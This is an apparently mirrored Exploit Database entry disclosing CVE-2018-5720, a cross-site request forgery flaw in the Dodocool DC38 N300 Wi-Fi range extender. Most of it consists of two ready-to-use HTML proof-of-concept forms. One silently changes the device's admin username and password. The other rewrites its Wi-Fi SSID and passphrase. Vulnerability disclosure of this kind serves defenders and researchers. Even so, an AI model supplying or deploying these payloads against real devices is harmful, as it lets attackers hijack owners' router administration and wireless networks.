Dodocool DC38 N300 – Cross-site Request Forgery

• Exploit Database
• 16 阅读

• 作者： Raffaele Sabato
  日期： 2018-01-26
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/43898/

• # Exploit Title: DODOCOOL DC38 N300 Cross-site Request Forgery
  # Date: 17-01-2018
  # Exploit Authors: Raffaele Sabato
  # Contact: https://twitter.com/syrion89
  # Vendor: DODOCOOL
  # Vendor Homepage: www.dodocool.com
  # Version: RTN2-AW.GD.R3465.1.20161103
  # CVE: CVE-2018-5720
  
  I DESCRIPTION
  ========================================================================
  
  An issue was discovered in DODOCOOL DC38 3-in-1 N300 Mini Wireless Range
  Extend RTN2-AW.GD.R3465.1.20161103 devices. A Cross-site request forgery
  (CSRF) vulnerability allows remote attackers to hijack the authentication
  of users for requests that modify the configuration.
  This vulnerability may lead to username and/or password changing, Wi-Fi
  password changing, etc.
  
  II PROOF OF CONCEPT
  ========================================================================
  
  ## Change user username and password (test_username:test_password):
  
  <html>
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://192.168.10.1/boafrm/formPasswordSetup"
  method="POST">
  <input type="hidden" name="submit&#45;url"
  value="&#47;setok&#46;htm&#63;bw&#61;main&#46;htm" />
  <input type="hidden" name="submit&#45;value" value="" />
  <input type="hidden" name="username" value="test&#95;username" />
  <input type="hidden" name="newpass" value="test&#95;password" />
  <input type="hidden" name="confpass" value="test&#95;password" />
  <input type="submit" value="Submit request" />
  </form>
  </body>
  </html>
  
  
  ## Change WiFi Configuration (WIFI_TEST:TestTest):
  
  <html>
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://192.168.10.1/boafrm/formWlanSetupREP"
  method="POST">
  <input type="hidden" name="submit&#45;url"
  value="&#47;setok&#46;htm&#63;bw&#61;wl&#95;rep&#46;htm" />
  <input type="hidden" name="submit&#45;value" value="repset" />
  <input type="hidden" name="wl&#95;onoff" value="0" />
  <input type="hidden"
  name="wps&#95;clear&#95;configure&#95;by&#95;reg" value="0" />
  <input type="hidden" name="wlProfileId" value="" />
  <input type="hidden" name="wl&#95;mode" value="0" />
  <input type="hidden" name="wl&#95;authType" value="auto" />
  <input type="hidden" name="wepEnabled" value="ON" />
  <input type="hidden" name="weplength" value="" />
  <input type="hidden" name="wepformat" value="" />
  <input type="hidden" name="wl&#95;wpaAuth" value="psk" />
  <input type="hidden" name="wl&#95;pskFormat" value="0" />
  <input type="hidden" name="wl&#95;pskValue" value="TestTest" />
  <input type="hidden" name="wl&#95;ssid" value="WIFI_TEST" />
  <input type="hidden" name="wl&#95;Method" value="6" />
  <input type="hidden" name="wep&#95;key" value="" />
  <input type="hidden" name="ciphersuite" value="tkip&#43;aes" />
  <input type="hidden" name="ciphersuite" value="aes" />
  <input type="hidden" name="wpa2ciphersuite" value="tkip&#43;aes" />
  <input type="hidden" name="wpa2ciphersuite" value="aes" />
  <input type="hidden" name="web&#95;pskValue" value="TestTest" />
  <input type="submit" value="Submit request" />
  </form>
  </body>
  </html>